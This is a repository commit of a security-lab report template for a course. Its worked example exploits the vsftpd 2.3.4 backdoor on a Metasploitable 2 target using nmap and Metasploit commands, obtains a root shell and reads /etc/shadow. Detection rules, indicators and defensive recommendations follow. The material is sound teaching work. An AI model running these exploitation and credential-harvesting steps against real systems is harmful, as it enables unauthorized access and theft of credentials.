jramos/seclab
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

initial commit

Browse Source
This commit is contained in:
jramos
2026-05-28 18:27:41 -06:00
commit 6d0035721e
45 changed files with 15082 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

310
LAB_REPORT_TEMPLATE.md Normal file
View File

@@ -0,0 +1,310 @@
# LAB REPORT TEMPLATE
# Apophis Networking Security Lab
**Student Name:** ___________________________
**Module Number:** ___________________________
**Lab Title:** ___________________________
**Date Submitted:** ___________________________
---
## 1. EXECUTIVE SUMMARY (1 paragraph)
Provide a high-level overview of the lab objectives, key findings, and outcomes. This should be understandable by non-technical stakeholders.
**Example:**
> This lab focused on exploiting the vsftpd 2.3.4 backdoor vulnerability (CVE-2011-2523) on a Metasploitable 2 target system. The exploitation was successful, resulting in root-level access to the target. Post-exploitation activities included credential harvesting and persistence establishment. This exercise demonstrated the critical importance of patch management and network segmentation in preventing unauthorized access.
---
## 2. OBJECTIVES
List the specific learning objectives for this lab.
**Example:**
- Configure and execute Metasploit Framework exploits
- Understand the mechanics of reverse shell payloads
- Perform post-exploitation enumeration
- Document exploitation chains for penetration testing reports
---
## 3. TOOLS & ENVIRONMENT
### 3.1 Attack Platform
- **OS:** Kali Linux 2024.1
- **IP Address:** 10.10.2.50
- **Tools Used:**
- Metasploit Framework v6.3.x
- Nmap 7.94
- Wireshark 4.0.x
### 3.2 Target System
- **OS:** Metasploitable 2 (Ubuntu 8.04)
- **IP Address:** 10.10.4.10
- **Vulnerable Services:**
- vsftpd 2.3.4 (Port 21)
- OpenSSH 4.7p1 (Port 22)
- Apache 2.2.8 (Port 80)
### 3.3 Network Topology
```
[Kali Linux] [pfSense Firewall] [Metasploitable 2]
10.10.2.50 <---> 10.10.2.1 | 10.10.4.1 <---> 10.10.4.10
VLAN 200 VLAN 400
(Red Team) (Victim Network)
```
---
## 4. METHODOLOGY
Describe the step-by-step process followed during the lab. Use numbered steps and include relevant commands.
### 4.1 Pre-Exploitation: Reconnaissance
**Step 1: Host Discovery**
```bash
nmap -sn 10.10.4.0/24
```
**Output:**
```
Nmap scan report for 10.10.4.10
Host is up (0.00042s latency).
```
**Step 2: Port Scanning**
```bash
sudo nmap -sS -sV -p- 10.10.4.10 -oA full_scan
```
**Output:**
```
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1
...
```
**Analysis:** vsftpd 2.3.4 identified—known to contain backdoor vulnerability (CVE-2011-2523).
### 4.2 Exploitation
**Step 3: Launch Metasploit**
```bash
msfconsole -q
```
**Step 4: Select Exploit Module**
```bash
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.4.10
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
```
**Output:**
```
[*] 10.10.4.10:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.4.10:6200 - Shell command shell session 1 opened
```
**Result:** Successful exploitation. Root shell obtained.
### 4.3 Post-Exploitation
**Step 5: Verify Access**
```bash
id
```
**Output:**
```
uid=0(root) gid=0(root)
```
**Step 6: Credential Harvesting**
```bash
cat /etc/shadow
```
**Output:** (Include first 3 lines only for report)
```
root:$1$XjpI2OBz$...:0:0:root:/root:/bin/bash
daemon:*:14684:0:99999:7:::
...
```
---
## 5. FINDINGS & ANALYSIS
### 5.1 Key Discoveries
**Vulnerability Identified:**
- **CVE:** CVE-2011-2523
- **Severity:** Critical (CVSS 10.0)
- **Description:** vsftpd 2.3.4 contains malicious backdoor code that opens shell access on port 6200 when username contains `:)` smiley face.
- **Exploitability:** Trivial—no authentication required.
**Impact Assessment:**
- **Confidentiality:** HIGH—Full read access to all files including /etc/shadow
- **Integrity:** HIGH—Root access allows file modification
- **Availability:** HIGH—Attacker could delete files or crash system
### 5.2 Network Traffic Analysis
**Wireshark Observations:**
- TCP stream 1: FTP connection (port 21) with malicious username
- TCP stream 2: Shell session on port 6200
- No encryption—all commands visible in plaintext
**Screenshot:** [Include Wireshark screenshot showing backdoor traffic]
---
## 6. INDICATORS OF COMPROMISE (IOCs)
| Type | Value | Description |
|------|-------|-------------|
| IP Address | 10.10.2.50 | Attacker source IP |
| Port | 6200 | vsftpd backdoor listening port |
| Process | vsftpd | Spawned root shell (suspicious parent) |
| Network | TCP SYN to 6200 | Connection to non-standard FTP port |
---
## 7. DEFENSIVE RECOMMENDATIONS
### 7.1 Immediate Actions
1. **Patch vsftpd:** Upgrade to version 3.0.5 or disable service if not needed
2. **Network Segmentation:** Block victim network from initiating connections to Red Team VLAN
3. **IDS Rule:** Deploy Suricata signature for port 6200 connections
### 7.2 Long-Term Improvements
1. **Vulnerability Management:** Implement automated scanning (weekly)
2. **Patch Management:** Establish SLA for critical patches (24-48 hours)
3. **Firewall Rules:** Default-deny egress from victim network
4. **Security Monitoring:** Alert on connections to non-standard ports
---
## 8. DETECTION ENGINEERING
### 8.1 Suricata Rule
```
alert tcp any any -> any 6200 (msg:"vsftpd 2.3.4 Backdoor Connection"; flow:established,to_server; sid:1000050; rev:1;)
```
### 8.2 Security Onion Query (KQL)
```
destination.port: 6200 AND event.module: "suricata"
```
### 8.3 MITRE ATT&CK Mapping
- **Tactic:** Initial Access (TA0001)
- **Technique:** T1190 - Exploit Public-Facing Application
- **Sub-Technique:** FTP Service Exploitation
---
## 9. CHALLENGES & TROUBLESHOOTING
**Challenge 1:** Initial exploit failed with "connection refused"
**Root Cause:** VLAN tag not set correctly on VM network interface in Proxmox.
**Solution:**
```bash
# Proxmox VM > Hardware > Network Device > Edit
# VLAN Tag: 400 (was blank)
```
**Challenge 2:** Wireshark showed no captured packets
**Root Cause:** Capturing on wrong interface (wlan0 instead of eth0).
**Solution:**
```bash
sudo tcpdump -i eth0 # Verify interface has traffic
sudo wireshark -i eth0
```
---
## 10. LESSONS LEARNED
### What Went Well
- Successful identification and exploitation of vulnerability
- Comprehensive documentation with screenshots
- Effective use of network segmentation for safe testing
### What Could Be Improved
- Faster troubleshooting (spent 30 minutes on VLAN issue)
- More thorough initial reconnaissance (missed some services)
- Should have taken VM snapshot before exploitation
### Key Takeaways
1. **Offensive Perspective:** Outdated software is trivially exploitable—attackers have automated scanners for this.
2. **Defensive Perspective:** One unpatched service can compromise entire network. Defense-in-depth is critical.
3. **Forensics Importance:** Without packet capture, proving the attack vector would be difficult in IR scenario.
---
## 11. APPENDICES
### Appendix A: Command History
```bash
# Full command history from Kali terminal
history > command_history.txt
```
(Attach file: command_history.txt)
### Appendix B: Screenshots
- Screenshot 1: Nmap scan results showing vsftpd 2.3.4
- Screenshot 2: Metasploit successful exploitation
- Screenshot 3: Root shell access (id command output)
- Screenshot 4: Wireshark PCAP showing port 6200 connection
- Screenshot 5: Security Onion alert for detection
### Appendix C: Packet Capture
(Attach file: exploitation.pcapng)
### Appendix D: Metasploit Output Log
(Attach file: msfconsole.log)
---
## 12. REFERENCES
1. National Vulnerability Database. (2011). CVE-2011-2523. Retrieved from https://nvd.nist.gov/vuln/detail/CVE-2011-2523
2. Rapid7. (2024). Metasploit Framework Documentation. Retrieved from https://docs.rapid7.com/metasploit/
3. MITRE Corporation. (2024). ATT&CK Framework - T1190. Retrieved from https://attack.mitre.org/techniques/T1190/
4. OWASP. (2021). Top 10 Web Application Security Risks. Retrieved from https://owasp.org/Top10/
---
## 13. DECLARATION
I certify that this lab report represents my own work and that all tools were used in an authorized, ethical manner within the confines of my personal lab environment. I understand that unauthorized computer access is illegal.
**Signature:** ___________________________
**Date:** ___________________________
---
**END OF LAB REPORT**
---
# GRADING RUBRIC FOR THIS REPORT
| Section | Points | Criteria |
|---------|--------|----------|
| Executive Summary | 5 | Clear, concise, non-technical language |
| Methodology | 20 | Step-by-step, reproducible, includes commands |
| Findings & Analysis | 20 | Technical depth, vulnerability details, impact |
| Screenshots | 15 | Relevant, annotated, high-quality |
| Detection Engineering | 15 | Custom rules, MITRE mapping, queries |
| Defensive Recommendations | 10 | Actionable, prioritized, realistic |
| Lessons Learned | 5 | Self-reflection, improvement mindset |
| Documentation Quality | 10 | Formatting, grammar, professionalism |
| **TOTAL** | **100** | |
**Minimum Passing Score:** 70/100